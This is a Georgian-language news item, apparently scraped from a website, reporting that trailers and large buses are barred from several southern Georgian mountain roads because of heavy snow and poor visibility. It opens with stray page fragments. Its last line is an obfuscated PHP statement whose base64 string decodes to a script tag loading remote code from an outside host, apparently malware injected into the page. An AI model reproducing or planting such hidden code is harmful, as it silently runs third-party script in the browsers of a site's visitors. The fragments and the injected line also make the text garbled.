celsiusi
ავერსი შნაიდერი

 საქართველოს რეგიონული განვითარებისა და ინფრასტრუქტურის სამინისტროს საავტომობილო გზების დეპარტამენტის ინფორმაციით, ხაშური-ახალციხე-ვალეს, ახალქალაქი-კარწახისა და ახალციხე-ნინოწმინდის გზების მონაკვეთებზე ავტოტრანსპორტის მოძრაობაზე შეზღუდვები დაწესდა.

„ინტენსიური თოვის, დაბალი ტემპერატურის და შეზღუდული ხილვადობის გამო საერთაშორისო მნიშვნელობის ხაშური-ახალციხე-ვალეს საავტომობილო გზის კმ51–კმ97 (აწყური-ვალე) მონაკვეთზე, ახალქალაქი-კარწახის საავტომობილო გზის კმ1-კმ36.5 მონაკვეთსა და ახალციხე-ნინოწმინდის საავტომობილო გზაზე აკრძალულია მისაბმელიანი, ნახევრადმისაბმელიანი ავტოტრანსპორტის და M3 კატეგორიის 22-ზე მეტი დასაჯდომი ადგილის (მძღოლის ადგილის გარდა) მქონე მგზავრთა გადასაყვანად განკუთვნილი ავტოსატრანსპორტო საშუალებების მოძრაობა, ხოლო დანარჩენი სახის ავტოტრანსპორტის მოძრაობა თავისუფალია“, – აღნიშნულია ინფორმაციაში.

162
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");